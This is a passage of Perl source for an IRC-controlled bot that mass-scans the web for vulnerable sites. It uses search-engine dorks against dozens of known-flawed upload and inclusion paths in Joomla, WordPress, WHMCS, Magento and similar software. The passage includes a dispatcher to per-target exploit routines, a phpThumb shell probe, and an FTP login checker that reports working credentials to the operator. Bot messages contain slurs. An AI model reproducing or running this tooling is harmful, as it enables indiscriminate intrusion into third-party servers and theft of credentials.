6Search Engine Loading ..."); &se_start($path,$bug,$dork,$engine,33,$nick); &write_dorks($dork); } } } } ############################################################################################## if ($msg =~ /^$horcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("/components/com_hotornot2/phpThumb/phpThumb.php",$1); my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","$horlogo3 $nick, 4Dont try re-scan dork "); exit; } else { &msg("$path","$horlogo 12Dork7 :4 $dork "); &msg("$path","$horlogo 6Search Engine Loading ..."); &se_start($path,$bug,$dork,$engine,34,$nick); &write_dorks($dork); } } } } if (&isAdmin($nick) && $msg =~ /^$xmlcmd\s+(.+?)\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ($1,$2); my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","4,1$nick 0,1 Gay Re-scan detected"); exit; } else { &msg("$chanxxx","4,1@4,1$nick 0,1Coli fucking on 4$path "); &msg("$path","14scanning xml started..."); sendraw("MODE $path +m"); &write_dorks($dork); &se_start($path,$bug,$dork,$engine,8,$nick); } } } } if ($msg =~ /^$clipcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("/admin_area/charts/ofc-library/ofc_upload_image.php",$1); my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","4,1$nick 0,1 Gay Re-scan detected"); exit; } else { &msg("$chanxxx","4,1@4,1$nick 0,1Coli fucking on 4$path "); &msg("$path","4,1scanning clip bucket started..."); sendraw("MODE $path +m"); &write_dorks($dork); &se_start($path,$bug,$dork,$engine,9,$nick); } } } } if ($msg =~ /^$fabcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1",$1); my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","$fablogo3 $nick, 4 Gay Dont try re-scan dork "); exit; } else { &msg("$path","$fablogo 12Dork7 :4 $dork "); &msg("$path","$fablogo 6Search Engine Loading ..."); &se_start($path,$bug,$dork,$engine,29,$nick); &write_dorks($dork); } } } } if ($msg =~ /^$redcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("/administrator/components/com_redmystic/chart/ofc-library/ofc_upload_image.php",$1); my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","4,1$nick 0,1Gay Re-scan detected"); exit; } else { &msg("$chanxxx","4,1@4,1$nick 0,1Coli fucking on 4$path "); &msg("$path","14scanning redmystic started..."); sendraw("MODE $path +m"); &write_dorks($dork); &se_start($path,$bug,$dork,$engine,10,$nick); } } } } if (&isAdmin($nick) && $msg =~ /^$whmcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("/cart.php?a=byroe&templatefile=",$1); my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","4,1$nick 0,1Gay Re-scan detected"); exit; } else { &msg("$chanxxx","14,1@4,1$nick 3Coli fucking on 0,1$path "); &msg("$path","4,1scanning whmcs started..."); sendraw("MODE $path +m"); &write_dorks($dork); &se_start($path,$bug,$dork,$engine,11,$nick); } } } } if ($msg =~ /^$livecmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("library/openFlashChart/ofc_upload_image.php",$1); my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","4,1$nick 0,1Gay Re-scan detected"); exit; } else { &msg("$chanxxx","4,1@4,1$nick 0,1Coli fucking on 4,1$path "); &msg("$path","4,1scanning livecart started..."); sendraw("MODE $path +m"); &write_dorks($dork); &se_start($path,$bug,$dork,$engine,12,$nick); } } } } if (&isAdmin($nick) && $msg =~ /^$refcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php",$1); my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","4,1$nick 0,1Gay Re-scan detected"); exit; } else { &msg("$chanxxx","4,1@4,1$nick 0,1Coli fucking on 4,1$path "); &msg("$path","4,1scanning reflex gallery started..."); sendraw("MODE $path +m"); &write_dorks($dork); &se_start($path,$bug,$dork,$engine,13,$nick); } } } } if (&isAdmin($nick) && $msg =~ /^$oscocmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $dork = $1; my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","4,1$nick 0,1Gay Re-scan detected"); exit; } else { &msg("$chanxxx","4,1@4,1$nick 0,1Coli fucking on 4,1$path "); &msg("$path","4,1scanning oscommerce started..."); sendraw("MODE $path +m"); &write_dorks($dork); &se_start($path,$bug,$dork,$engine,14,$nick); } } } } if ($msg =~ /^$switchcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("wp-content/themes/switchblade/framework/_scripts/valums_uploader/php.php",$1); my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","4,1$nick 0,1Gay Re-scan detected"); exit; } else { &msg("$chanxxx","4,1@4,1$nick 0,1Coli fucking on 4,1$path "); &msg("$path","4,1scanning switchblade started..."); sendraw("MODE $path +m"); &write_dorks($dork); &se_start($path,$bug,$dork,$engine,15,$nick); } } } } if ($msg =~ /^$photocmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("assets/uploadify/old/uploadify.php",$1); my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","4,1$nick 0,1Gay Re-scan detected"); exit; } else { &msg("$chanxxx","4,1@4,1$nick 0,1Coli fucking on 4,1$path "); &msg("$path","4,1scanning photostore started..."); sendraw("MODE $path +m"); &write_dorks($dork); &se_start($path,$bug,$dork,$engine,16,$nick); } } } } if ($msg =~ /^$elemincmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("wp-content/themes/elemin/themify/themify-ajax.php",$1); my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","4,1$nick 0,1Gay Re-scan detected"); exit; } else { &msg("$chanxxx","4,1@4,1$nick 0,1Coli fucking on 4,1$path "); &msg("$path","4,1scanning elemin started..."); sendraw("MODE $path +m"); &write_dorks($dork); &se_start($path,$bug,$dork,$engine,17,$nick); } } } } if ($msg =~ /^$revcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $dork = $1; my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","4,1$nick 0,1Gay Re-scan detected"); exit; } else { &msg("$chanxxx","4,1@4,1$nick 0,1Coli fucking on 4,1$path "); &msg("$path","4,1scanning RevSlider started..."); sendraw("MODE $path +m"); &write_dorks($dork); &se_start($path,$bug,$dork,$engine,18,$nick); } } } } if ($msg =~ /^$rescmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("wp-admin/admin-ajax.php",$1); my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","4,1$nick 0,1Gay Re-scan detected"); exit; } else { &msg("$chanxxx","4,1@4,1$nick 0,1Coli fucking on 4,1$path "); &msg("$path","4,1scanning RevSlider Upload started..."); sendraw("MODE $path +m"); &write_dorks($dork); &se_start($path,$bug,$dork,$engine,25,$nick); } } } } if ($msg =~ /^$foliocmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php",$1); my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","4,1$nick 0,1Gay Re-scan detected"); exit; } else { &msg("$chanxxx","4,1@4,1$nick 0,1Coli fucking on 4,1$path "); &msg("$path","4,1scanning folioway started..."); sendraw("MODE $path +m"); &write_dorks($dork); &se_start($path,$bug,$dork,$engine,19,$nick); } } } } if ($msg =~ /^$rcicmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("/php-ofc-library/ofc_upload_image.php",$1); my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","4,1$nick 0,1Gay Re-scan detected"); exit; } else { &msg("$chanxxx","4,1@4,1$nick 0,1Coli fucking on 4,1$path ");; &msg("$path","4,1scanning rci started..."); sendraw("MODE $path +m"); &write_dorks($dork); &se_start($path,$bug,$dork,$engine,20,$nick); } } } } if ($msg =~ /^$rficmd\s+(.+?)\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ($1,$2); my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","4,1$nick 0,1Gay Re-scan detected"); exit; } else { &msg("$chanxxx","4,1@4,1$nick 0,1Coli fucking on 4,1$path "); &msg("$path","4,1scanning rfi started..."); sendraw("MODE $path +m"); &write_dorks($dork); &se_start($path,$bug,$dork,$engine,4,$nick); } } } } if ($msg =~ /^$upcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("/includes/uploadify/upload_settings_image.php",$1); my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","4,1$nick 0,1Gay Re-scan detected"); exit; } else { &msg("$chanxxx","4,1@4,1$nick 0,1Coli fucking on 4,1$path "); &msg("$path","4,1Scanning uploadify started..."); sendraw("MODE $path +m"); &write_dorks($dork); &se_start($path,$bug,$dork,$engine,21,$nick); } } } } if ($msg =~ /^$jinccmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php",$1); my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","4,1$nick 0,1Gay Re-scan detected"); exit; } else { &msg("$chanxxx","4,1@4,1$nick 0,1Coli fucking on 4,1$path "); &msg("$path","4,1scanning jinc started..."); sendraw("MODE $path +m"); &write_dorks($dork); &se_start($path,$bug,$dork,$engine,22,$nick); } } } } if ($msg =~ /^$jnewscmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php",$1); my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","4,1$nick 0,1Gay Re-scan detected"); exit; } else { &msg("$chanxxx","4,1@4,1$nick 0,1Coli fucking on 4,1$path "); &msg("$path","4,1scanning jnews started..."); sendraw("MODE $path +m"); &write_dorks($dork); &se_start($path,$bug,$dork,$engine,23,$nick); } } } } if ($msg =~ /^$mgcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $dork = $1; my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","4,1$nick 0,1Gay Re-scan detected"); exit; } else { &msg("$chanxxx","4,1@4,1$nick 0,1Coli fucking on 4,1$path "); &msg("$path","4,1scanning Magento started..."); sendraw("MODE $path +m"); &write_dorks($dork); &se_start($path,$bug,$dork,$engine,26,$nick); } } } } if ($msg =~ /^$mg2cmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("Logo Design by dewi",$1); my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","4,1$nick 0,1Re-scan detected"); exit; } else { &msg("$chanxxx","4,1@4,1$nick 0,1Coli fucking on 4,1$path "); &msg("$path","4,1scanning MagMi started..."); sendraw("MODE $path +m"); &write_dorks($dork); &se_start($path,$bug,$dork,$engine,27,$nick); } } } } if ($msg =~ /^$jdlcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("/index.php?option=com_jdownloads&Itemid=0&view=upload",$1); my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","$jdllogo3 $nick, 4Dont try re-scan dork "); exit; } else { &msg("$path","$jdllogo 12Dork7 :4 $dork "); &msg("$path","$jdllogo 6Search Engine Loading ..."); &se_start($path,$bug,$dork,$engine,28,$nick); &write_dorks($dork); } } } } if ($msg =~ /^$osco2cmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $dork = $1; &msg("$chanxxx","4,1Bosss...0,1 Lapor4,1 $nick0,1 lagi scan tuh di 4,1$path "); &msg("$path","$oscologo4,1Dork0,1 $dork "); #&msg("$path","$oscologo4WARNING6 :15,1 nahh kan indah semua pada akhir nya... !!!9,1 Okay"); sendraw("MODE $path +m"); &se_start($path,$bug,$dork,$engine,24,$nick); } } } if ($msg =~ /^$ftpcmd\s+(.+?)\s+(.*)\s+(.*)/) { my $url = $_[0]; my $host = $_[1]; my $user = $_[2]; my $pass = $_[3]; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($host,$user,$pass) = ($1,$2,$3); &msg("$path","4,1[0,1!4,1]FTP 0,1<4,1=0,1>4,1 Checking $host | $user:$pass"); my $success = 1; use Net::FTP; my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 5); $success = 0 if $ftp->login($user,$pass); $ftp->quit; if ($success == 0) { ¬ice("$admin","4,1 [0,1FTP4,1] [ 0,1http://".$host." 4,1] [".$user.":".$pass."0,1] 4,1Success "); } else { ¬ice("$admin","4,1 [0,1FTP4,1] [ 0,1http://".$host." 4,1] [".$user.":".$pass."0,1] 4,1Denied "); } } } } } } for(my $c=0; $c<= $#lines; $c++) { $line = $lines[$c]; $line = $line_temp.$line if ($line_temp); $line_temp = ''; $line =~ s/\r$//; unless ($c == $#lines) { parse("$line"); } else { if ($#lines == 0) { parse("$line"); } elsif ($lines[$c] =~ /\r$/) { parse("$line"); } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { parse("$line"); } else { $line_temp = $line; } } } } } ################################################################################## sub magic() { my $dork = $_[0]; my @targets; for (my $st=0; $st<=1000 ; $st+=100){ my $engine = "http://www.google.com/search?q=".uri_escape($dork)."&num=100&start=".$st; my $browser = &search_engine_query($engine); while ($browser =~ m/ 0) { foreach my $site(@target) { $count++; if ($count == $num-1) { &msg("$chan","$carilogo4,1Finished 0,1for 4,1$dork "); } my $test = "http://".$site.".php?src=".$thumbshell; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $coba = &get_content($test); if ($coba =~ /Unable to open image/) { &msg($chan,"$carilogo4,1 VulN 0,1-> 4,1 http://".$site.".php "); } } exit; } } } } sub type() { my ($chan,$bug,$dork,$engine,$type,$nick) = @_; if ($type == 1){$type=&thumb_exploit($chan,$bug,$dork,$engine,$nick);} elsif ($type == 2){$type=&lfi_exploit($chan,$bug,$dork,$engine,$nick);} elsif ($type == 3){$type=&e107_exploit($chan,$bug,$dork,$engine,$nick);} elsif ($type == 4){$type=&zero_exploit($chan,$bug,$dork,$engine,$nick);} elsif ($type == 5){$type=&mmfc_exploit($chan,$bug,$dork,$engine,$nick);} elsif ($type == 6){$type=&zen_exploit($chan,$bug,$dork,$engine,$nick);} elsif ($type == 6){$type=&zen2_exploit($chan,$bug,$dork,$engine,$nick);} elsif ($type == 6){$type=&zen_sql($chan,$bug,$dork,$engine,$nick);} elsif ($type == 7){$type=&jce_exploit($chan,$bug,$dork,$engine,$nick);} elsif ($type == 8){$type=&xml_exploit($chan,$bug,$dork,$engine,$nick);} elsif ($type == 9){$type=&clip_exploit($chan,$bug,$dork,$engine,$nick);} elsif ($type == 10){$type=&red_exploit($chan,$bug,$dork,$engine,$nick);} elsif ($type == 11){$type=&whm_exploit($chan,$bug,$dork,$engine,$nick);} elsif ($type == 12){$type=&live_exploit($chan,$bug,$dork,$engine,$nick);} elsif ($type == 13){$type=&reflex_exploit($chan,$bug,$dork,$engine,$nick);} elsif ($type == 14){$type=&osco_exploit($chan,$bug,$dork,$engine,$nick);} elsif ($type == 15){$type=&switch_exploit($chan,$bug,$dork,$engine,$nick);} elsif ($type == 16){$type=&photo_exploit($chan,$bug,$dork,$engine,$nick);} elsif ($type == 17){$type=&elemin_exploit($chan,$bug,$dork,$engine,$nick);} elsif ($type == 18){$type=&RevSlider_exploit($chan,$bug,$dork,$engine,$nick);} elsif ($type == 18){$type=&RevSlider2_exploit($chan,$bug,$dork,$engine,$nick);} elsif ($type == 19){$type=&folio_exploit($chan,$bug,$dork,$engine,$nick);} elsif ($type == 20){$type=&rci_exploit($chan,$bug,$dork,$engine,$nick);} elsif ($type == 21){$type=&up_exploit($chan,$bug,$dork,$engine,$nick);} elsif ($type == 22){$type=&jinc_exploit($chan,$bug,$dork,$engine,$nick);} elsif ($type == 23){$type=&jnews_exploit($chan,$bug,$dork,$engine,$nick);} elsif ($type == 24){$type=&osco2_exploit($chan,$bug,$dork,$engine,$nick);} elsif ($type == 25){$type=&rev_exploit($chan,$bug,$dork,$engine,$nick);} elsif ($type == 26){$type=&magento($chan,$bug,$dork,$engine,$nick);} elsif ($type == 27){$type=&magmi_exploit($chan,$bug,$dork,$engine,$nick);} elsif ($type == 28){$type=&jdl_exploit($chan,$bug,$dork,$engine,$nick);} elsif ($type == 29){$type=&fab_exploit($chan,$bug,$dork,$engine,$nick);} elsif ($type == 30){$type=&flexi_exploit($chan,$bug,$dork,$engine,$nick);} elsif ($type == 31){$type=&jmulti_exploit($chan,$bug,$dork,$engine,$nick);} elsif ($type == 32){$type=&alpha_exploit($chan,$bug,$dork,$engine,$nick);} elsif ($type == 33){$type=&act_exploit($chan,$bug,$dork,$engine,$nick);} elsif ($type == 34){$type=&hornot_exploit($chan,$bug,$dork,$engine,$nick);} } ################################################################################## sub se_start() { my ($chan,$bug,$dork,$engine,$type,$nick) = @_; if ($engine =~ /googleCA/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeCA",$type,$nick); } exit; } } if ($engine =~ /googleDE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeDE",$type,$nick); } exit; } } if ($engine =~ /googleUK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeUK",$type,$nick); } exit; } } if ($engine =~ /googleFR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeFR",$type,$nick); } exit; } } if ($engine =~ /googleES/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeES",$type,$nick); } exit; } } if ($engine =~ /googleIT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeIT",$type,$nick); } exit; } } if ($engine =~ /googleNL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeNL",$type,$nick); } exit; } } if ($engine =~ /googleBE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeBE",$type,$nick); } exit; } } if ($engine =~ /googleCH/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeCH",$type,$nick); } exit; } } if ($engine =~ /googleSE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeSE",$type,$nick); } exit; } } if ($engine =~ /googleDK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeDK",$type,$nick); } exit; } } if ($engine =~ /googleNO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeNO",$type,$nick); } exit; } } if ($engine =~ /googleNZ/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeNZ",$type,$nick); } exit; } } if ($engine =~ /googleIE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeIE",$type,$nick); } exit; } } if ($engine =~ /googleBR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeBR",$type,$nick); } exit; } } if ($engine =~ /googleAR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeAR",$type,$nick); } exit; } } if ($engine =~ /googleCO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeCO",$type,$nick); } exit; } } if ($engine =~ /googleCU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeCU",$type,$nick); } exit; } } if ($engine =~ /googleCL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeCL",$type,$nick); } exit; } } if ($engine =~ /googleMX/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeMX",$type,$nick); } exit; } } if ($engine =~ /googleAU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeAU",$type,$nick); } exit; } } if ($engine =~ /googleRU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeRU",$type,$nick); } exit; } } if ($engine =~ /googleAT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeAT",$type,$nick); } exit; } } if ($engine =~ /googlePL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLePL",$type,$nick); } exit; } } if ($engine =~ /googleIL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeIL",$type,$nick); } exit; } } if ($engine =~ /googleTR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeTR",$type,$nick); } exit; } } if ($engine =~ /googleUA/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeUA",$type,$nick); } exit; } } if ($engine =~ /googleGR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeGR",$type,$nick); } exit; } } if ($engine =~ /googleJP/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeJP",$type,$nick); } exit; } } if ($engine =~ /googleCN/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeCN",$type,$nick); } exit; } } if ($engine =~ /googleMY/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeMY",$type,$nick); } exit; } } if ($engine =~ /googleTH/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeTH",$type,$nick); } exit; } } if ($engine =~ /googleIN/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeIN",$type,$nick); } exit; } } if ($engine =~ /googleKR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeKR",$type,$nick); } exit; } } if ($engine =~ /googleRO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeRO",$type,$nick); } exit; } } if ($engine =~ /googleTW/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeTW",$type,$nick); } exit; } } if ($engine =~ /googleZA/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeZA",$type,$nick); } exit; } } if ($engine =~ /googlePT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLePT",$type,$nick); } exit; } } if ($engine =~ /askCA/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKCA",$type,$nick); } exit; } } if ($engine =~ /askDE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKDE",$type,$nick); } exit; } } if ($engine =~ /askIT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKIT",$type,$nick); } exit; } } if ($engine =~ /askFR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKFR",$type,$nick); } exit; } } if ($engine =~ /askES/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKES",$type,$nick); } exit; } } if ($engine =~ /askRU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKRU",$type,$nick); } exit; } } if ($engine =~ /askNL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKNL",$type,$nick); } exit; } } if ($engine =~ /askUK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKUK",$type,$nick); } exit; } } if ($engine =~ /askBR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKBR",$type,$nick); } exit; } } if ($engine =~ /askPL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKPL",$type,$nick); } exit; } } if ($engine =~ /askAU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKAU",$type,$nick); } exit; } } if ($engine =~ /askAT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKAT",$type,$nick); } exit; } } if ($engine =~ /askJP/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKJP",$type,$nick); } exit; } } if ($engine =~ /askSE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKSE",$type,$nick); } exit; } } if ($engine =~ /askMX/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKMX",$type,$nick); } exit; } } if ($engine =~ /askNO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKNO",$type,$nick); } exit; } } if ($engine =~ /askDK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKDK",$type,$nick); } exit; } } if ($engine =~ /bingDE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingDE",$type,$nick); } exit; } } if ($engine =~ /bingUK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingUK",$type,$nick); } exit; } } if ($engine =~ /bingCA/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingCA",$type,$nick); } exit; } } if ($engine =~ /bingBR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingBR",$type,$nick); } exit; } } if ($engine =~ /bingFR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingFR",$type,$nick); } exit; } } if ($engine =~ /bingES/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingES",$type,$nick); } exit; } } if ($engine =~ /bingIT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingIT",$type,$nick); } exit; } } if ($engine =~ /bingBE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingBE",$type,$nick); } exit; } } if ($engine =~ /bingNL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingNL",$type,$nick); } exit; } } if ($engine =~ /bingPT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingPT",$type,$nick); } exit; } } if ($engine =~ /bingNO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingNO",$type,$nick); } exit; } } if ($engine =~ /bingDK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { 